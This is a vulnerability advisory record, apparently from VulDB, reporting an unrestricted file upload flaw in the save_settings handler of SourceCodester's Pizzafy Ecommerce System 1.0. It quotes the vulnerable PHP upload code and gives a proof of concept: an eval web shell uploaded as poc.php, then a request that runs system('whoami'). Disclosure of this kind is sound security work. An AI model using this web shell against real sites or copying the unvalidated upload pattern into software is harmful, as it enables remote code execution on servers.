| 제목 | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 Unrestricted Upload |
|---|
| 설명 | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 is affected by an unrestricted file upload vulnerability in the save_settings function of the file /admin/admin_class_novo.php (endpoint /admin/ajax.php?action=save_settings, the Site Settings / Setting Handler component).
The handler reads the uploaded "Image" file from $_FILES['img'], builds the destination path from the attacker-controlled original filename ($_FILES['img']['name']) and moves it into the web-accessible directory ../assets/img/ via move_uploaded_file(). Although the file extension is computed with pathinfo(), it is never validated against an allow-list, and there is no MIME/content-type check and no filename randomization. As a result, files of any type (including .php) are stored under a predictable, directly reachable URL.
Affected code (admin_class_novo.php, save_settings):
if(!isset($_SESSION['login_id'])) { return 2; }
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != '') {
$target_dir = "../assets/img/";
$file_name = $_FILES['img']['name'];
$target_file = $target_dir . $file_name;
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if(move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) { ... }
}
Impact: an authenticated administrator can upload a PHP file and execute arbitrary OS commands (remote code execution) in the context of the web server.
Proof of Concept:
1. Log in to the admin panel.
2. Open /admin/index.php?page=site_settings.
3. In the Image field (name="img") upload poc.php containing: <?php eval($_GET[1]); ?>
4. Submit; the form posts to /admin/ajax.php?action=save_settings and the file is stored at /assets/img/poc.php.
5. Request /assets/img/poc.php?1=system('whoami'); to execute commands.
This vulnerability requires an authenticated administrator session. CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2). Note: this is a different sink than CVE-2026-7393, which affects the save_menu function; this report concerns the save_settings function.
|
|---|
| 원천 | ⚠️ https://github.com/leidyardila981-creator/Pizzafy-Ecommerce-1.0-save_settings-File-Upload-RCE |
|---|
| 사용자 | q1w2e3r4t5y6 (UID 98995) |
|---|
| 제출 | 2026. 06. 14. PM 04:45 (1 월 ago) |
|---|
| 모더레이션 | 2026. 07. 18. PM 02:31 (1 month later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 380048 [SourceCodester Pizzafy Ecommerce System 1.0 admin_class_novo.php save_settings img 권한 상승] |
|---|
| 포인트들 | 20 |
|---|